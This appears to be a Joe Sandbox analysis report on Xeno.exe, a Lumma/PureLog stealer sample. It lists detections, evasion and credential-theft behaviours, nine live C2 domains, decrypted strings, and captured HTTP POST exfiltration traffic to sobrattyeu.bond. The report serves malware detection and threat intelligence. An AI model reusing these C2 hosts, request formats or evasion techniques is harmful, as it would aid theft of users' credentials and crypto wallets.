Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Xeno.exe

Overview

General Information

Sample name:Xeno.exe
Analysis ID:1591988
MD5:1e5f4ee4303aa49c9c32e89132c7b4f9
SHA1:47a80fa40216ef35cb66dbbf45ffda5eabc803cb
SHA256:ae0ad87b9d4cb0599d08afc3890f98d62c7cf02405ed8aab3d5238814d90febb
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected PureLog Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to modify clipboard data
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Xeno.exe (PID: 5544 cmdline: "C:\Users\user\Desktop\Xeno.exe" MD5: 1E5F4EE4303AA49C9C32E89132C7B4F9)
    • Xeno.exe (PID: 3020 cmdline: "C:\Users\user\Desktop\Xeno.exe" MD5: 1E5F4EE4303AA49C9C32E89132C7B4F9)
    • WerFault.exe (PID: 1740 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5544 -s 924 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["immolatechallen.bond", "jarry-fixxer.bond", "stripedre-lot.bond", "jarry-deatile.bond", "crookedfoshe.bond", "strivehelpeu.bond", "growthselec.bond", "pain-temper.bond", "sobrattyeu.bond"], "Build id": "yau6Na--914510980"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Xeno.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000000.1685351915.0000000000B92000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Process Memory Space: Xeno.exe PID: 3020JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
              decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                0.0.Xeno.exe.b90000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.Xeno.exe.3f99550.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.Xeno.exe.3f99550.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-15T16:16:08.174345+010020283713Unknown Traffic192.168.2.449731104.21.96.1443TCP
                      2025-01-15T16:16:09.762669+010020283713Unknown Traffic192.168.2.449733104.21.96.1443TCP
                      2025-01-15T16:16:11.165133+010020283713Unknown Traffic192.168.2.449737104.21.96.1443TCP
                      2025-01-15T16:16:24.157230+010020283713Unknown Traffic192.168.2.449746104.21.96.1443TCP
                      2025-01-15T16:16:25.542673+010020283713Unknown Traffic192.168.2.449747104.21.96.1443TCP
                      2025-01-15T16:16:26.775321+010020283713Unknown Traffic192.168.2.449748104.21.96.1443TCP
                      2025-01-15T16:16:28.553985+010020283713Unknown Traffic192.168.2.449749104.21.96.1443TCP
                      2025-01-15T16:16:34.346120+010020283713Unknown Traffic192.168.2.449750104.21.96.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-15T16:16:08.699297+010020546531A Network Trojan was detected192.168.2.449731104.21.96.1443TCP
                      2025-01-15T16:16:10.264589+010020546531A Network Trojan was detected192.168.2.449733104.21.96.1443TCP
                      2025-01-15T16:16:34.853352+010020546531A Network Trojan was detected192.168.2.449750104.21.96.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-15T16:16:08.699297+010020498361A Network Trojan was detected192.168.2.449731104.21.96.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-15T16:16:10.264589+010020498121A Network Trojan was detected192.168.2.449733104.21.96.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-15T16:16:27.517223+010020480941Malware Command and Control Activity Detected192.168.2.449748104.21.96.1443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 0.2.Xeno.exe.3f99550.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["immolatechallen.bond", "jarry-fixxer.bond", "stripedre-lot.bond", "jarry-deatile.bond", "crookedfoshe.bond", "strivehelpeu.bond", "growthselec.bond", "pain-temper.bond", "sobrattyeu.bond"], "Build id": "yau6Na--914510980"}
                      Multi AV Scanner detection for submitted file
                      Source: Xeno.exeVirustotal: Detection: 47%Perma Link
                      Source: Xeno.exeReversingLabs: Detection: 60%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.6% probability
                      Machine Learning detection for sample
                      Source: Xeno.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: jarry-fixxer.bond
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: pain-temper.bond
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: jarry-deatile.bond
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: growthselec.bond
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: stripedre-lot.bond
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: immolatechallen.bond
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: crookedfoshe.bond
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: strivehelpeu.bond
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: sobrattyeu.bond
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: Workgroup: -
                      Source: 00000000.00000002.1847669217.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString decryptor: yau6Na--914510980
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 1_2_00414B68 CryptUnprotectData,1_2_00414B68
                      Source: Xeno.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49746 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49749 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.4:49750 version: TLS 1.2
                      Source: Xeno.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: System.Windows.Forms.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: mscorlib.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: Manjohn.pdbt-^q source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: System.pdbh source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: Manjohn.pdb source: Xeno.exe, WERD33A.tmp.dmp.4.dr
                      Source: Binary string: System.ni.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: Binary string: System.pdb source: WERD33A.tmp.dmp.4.dr
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-1174A60Fh]1_2_00427090
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov esi, dword ptr [0044979Ch]1_2_0040D190
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042D19A
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h1_2_00440AB0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 27BE92A4h1_2_00440AB0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov eax, edx1_2_0040D363
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-02D04E4Dh]1_2_00440B90
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh1_2_00441450
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 53585096h1_2_0042806B
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov ebp, edx1_2_00428811
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov word ptr [eax], cx1_2_00428811
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov word ptr [eax], cx1_2_004208E0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov ch, dl1_2_00408080
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h1_2_0042C080
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov esi, edx1_2_00425099
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov word ptr [edi], cx1_2_00425099
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042D944
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042D955
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov dword ptr [esp+08h], edx1_2_00415901
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-68h]1_2_00415901
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_00415901
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042D91A
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+36h]1_2_0040C12D
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov word ptr [eax], cx1_2_004291C3
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_00429986
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_00429986
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx eax, byte ptr [esp+ebp+06h]1_2_0041A9E5
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_00429986
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_00429986
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+509ACCB5h]1_2_00440190
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_0042A9B0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then add eax, ecx1_2_0042EA70
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+509ACCB5h]1_2_00440270
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]1_2_00402AE0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]1_2_004072F0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]1_2_004072F0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+198CD995h]1_2_00418281
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+198CD995h]1_2_00418376
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+761380B1h]1_2_004273C0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+35h]1_2_004273E0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ebx, byte ptr [edx]1_2_00437380
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]1_2_0040BC4E
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov edx, ebx1_2_0043AC10
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov edi, eax1_2_00427CE5
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov word ptr [ecx], si1_2_0041B571
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]1_2_0041DD70
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+2BA72EFAh]1_2_00424513
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+34h]1_2_00429D10
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov byte ptr [edx], al1_2_00419E2F
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov byte ptr [edx], al1_2_00419E2F
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx-0Ch]1_2_0040BD36
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov word ptr [ecx], si1_2_0041B588
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov word ptr [ebx], cx1_2_0041A591
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-5365E318h]1_2_00420DA0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax+48643817h]1_2_0043EDA6
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+509ACCB5h]1_2_0043FE40
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx esi, byte ptr [ecx]1_2_0040A610
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov byte ptr [edx], al1_2_00419E2F
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h1_2_0043D630
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+736218E3h]1_2_004406D0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+509ACCB5h]1_2_004406D0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0042E6F5
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 6F32DC84h1_2_0043D6A0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+509ACCB5h]1_2_0043FF50
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+509ACCB5h]1_2_0043FF70
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h1_2_00418700
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h1_2_00418700
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov byte ptr [edi], al1_2_0042E6F3
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov byte ptr [edi], cl1_2_0042DFC3
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then mov byte ptr [esi], cl1_2_0042D7C0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then test esi, esi1_2_0043AFD0
                      Source: C:\Users\user\Desktop\Xeno.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-72CEDD06h]1_2_004197F0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49733 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49733 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49748 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49750 -> 104.21.96.1:443
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: immolatechallen.bond
                      Source: Malware configuration extractorURLs: jarry-fixxer.bond
                      Source: Malware configuration extractorURLs: stripedre-lot.bond
                      Source: Malware configuration extractorURLs: jarry-deatile.bond
                      Source: Malware configuration extractorURLs: crookedfoshe.bond
                      Source: Malware configuration extractorURLs: strivehelpeu.bond
                      Source: Malware configuration extractorURLs: growthselec.bond
                      Source: Malware configuration extractorURLs: pain-temper.bond
                      Source: Malware configuration extractorURLs: sobrattyeu.bond
                      Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                      Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49749 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49750 -> 104.21.96.1:443
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49748 -> 104.21.96.1:443
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sobrattyeu.bond
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 51Host: sobrattyeu.bond
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0C84Y36Y3OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18119Host: sobrattyeu.bond
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XVKS6T05H4JF1683U6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8788Host: sobrattyeu.bond
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WLMONHV8TNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20393Host: sobrattyeu.bond
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WWDJ5BXJR9T6I9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1391Host: sobrattyeu.bond
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RFRJMFWTEQN7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568321Host: sobrattyeu.bond
                      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: sobrattyeu.bond
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: sobrattyeu.bond
                      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: sobrattyeu.bond
                      Source: Xeno.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: Xeno.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                      Source: Xeno.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                      Source: Xeno.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: Xeno.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: Xeno.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: Xeno.exeString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: Xeno.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: Xeno.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: Xeno.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                      Source: Xeno.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                      Source: Xeno.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                      Source: Xeno.exeString found in binary or memory: http://ocsp.digicert.com0A
                      Source: Xeno.exeString found in binary or memory: http://ocsp.digicert.com0C
                      Source: Xeno.exeString found in binary or memory: http://ocsp.digicert.com0H
                      Source: Xeno.exeString found in binary or memory: http://ocsp.digicert.com0I
                      Source: Xeno.exeString found in binary or memory: http://ocsp.digicert.com0X
                      Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
                      Source: Xeno.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: Xeno.exe, 00000001.00000002.2943363662.000000000356D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sobrattyeu.bond/
                      Source: Xeno.exe, 00000001.00000002.2943363662.000000000356D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sobrattyeu.bond/C
